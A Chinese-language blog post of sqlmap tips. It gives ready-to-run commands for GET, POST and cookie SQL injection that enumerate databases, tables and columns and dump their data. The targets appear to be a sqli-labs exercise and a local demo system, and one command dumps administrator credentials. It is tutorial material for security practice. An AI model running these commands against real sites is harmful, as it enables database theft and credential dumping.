sqlMap使用技巧

 

post型注入查找数据库(eg:将抓到的包保存为1.txt,并放到c盘根目录下。)

python sqlmap.py -r c:\1.txt -p username --dbs

参数说明

-r表示加载一个文件,-p指定参数。

cookie注人
sqlmap.py -u "http://192.168.189.1:81/admin/letter/delsystem?ids=1" --cookie "inxedulogin_sys_user_=inxedulogin_sys_user_1" --dbs --level 2

 

猜解是否能注入(get型)
python sqlmap.py -u "http://110.40.250.105:8065/Less-6/?id=1"
用于mysq注入
查找数据库
python sqlmap.py -u "http://110.40.250.105:8065/Less-6/?id=1" --dbs
查找数据库下的表(security库)
python sqlmap.py -u "http://110.40.250.105:8065/Less-6/?id=1" -D security --tables
查找表下的列名(security 库下users表的列名)
python sqlmap.py -u "http://110.40.250.105:8065/Less-6/?id=1" -D security -T users --columns
查找字段的值(security 库下users表的"id,password,username"的值)
python sqlmap.py -u "http://110.40.250.105:8065/Less-6/?id=1" -D security -T users -C "id,password,username" --dump
暴管理员登录密码
sqlmap.py -u "http://192.168.189.1:81/admin/letter/delsystem?ids=1" --cookie "inxedulogin_sys_user_=inxedulogin_sys_user_1" -D demo_inxedu_v2_0_open -T sys_user -C "LOGIN_NAME,LOGIN_PWD,USER_NAME" --dump --level 2

--password 查看数据库所有用户名的密码
--current-user 查看数据库当前用户
--is-dba 判断当前用户是否有管理权限
--roles 列出数据库管理员角色
--current-db 查看当前数据库
补充:--dbs爆所有数据库
爆出指定数据库指定表指定列下的数据 --dump
爆出该网站数据库中的所有数据(--dump-all)

--level 5 设置等级为5,默认是1
默认是1。等级越高,说明探测时使用的payload也越多。其中5级的payload最多,会自动破解出cookie、XFF等头部注入。
当然,等级越高,探测的时间也越慢。这个参数会影响测试的注入点,GET和POST的数据都会进行测试,
HTTP cookie在level为2时就会测试,
HTTP User-Agent/Referer头在level为3时就会测试。
在不确定哪个参数为注入点时,为了保证准确性,建议设置level为5
--risk=3 设置危险等级为3
默认风险等级为1,此等级在大多数情况下对测试目标无害。 风险等级2添加了基于时间的注入测试,等级3添加了OR测试。


https://blog.csdn.net/m0_47418965/article/details/121208978
https://blog.csdn.net/wxq8102/article/details/118627889

 

posted @ 2022-07-12 00:30  lzstar-A2  阅读(94)  评论(0编辑  收藏  举报